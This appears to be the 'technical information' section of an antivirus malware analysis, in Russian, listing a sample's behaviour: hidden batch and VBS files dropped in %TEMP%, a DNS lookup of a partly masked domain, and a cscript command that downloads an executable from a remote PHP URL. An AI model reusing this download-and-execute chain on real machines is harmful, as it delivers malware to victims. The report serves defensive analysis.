Техническая информация
- '<SYSTEM32>\cmd.exe' /c %TEMP%\hgcghhasd.bat
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\hgcghhasd.bat
- %TEMP%\jvjhvfjasd.vbs
- %TEMP%\1191161.cvr
- %TEMP%\jvjhvfjasd.vbs
- 'ex######.isquareinfomedia.com':80
- DNS ASK ex######.isquareinfomedia.com
- '<SYSTEM32>\cscript.exe' //Nologo %TEMP%\JvjhvFJasd.vbs http://ex######.isquareinfomedia.com/sound/solution.php %TEMP%\dddscsda.exe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\hgcghhasd.bat' (со скрытым окном)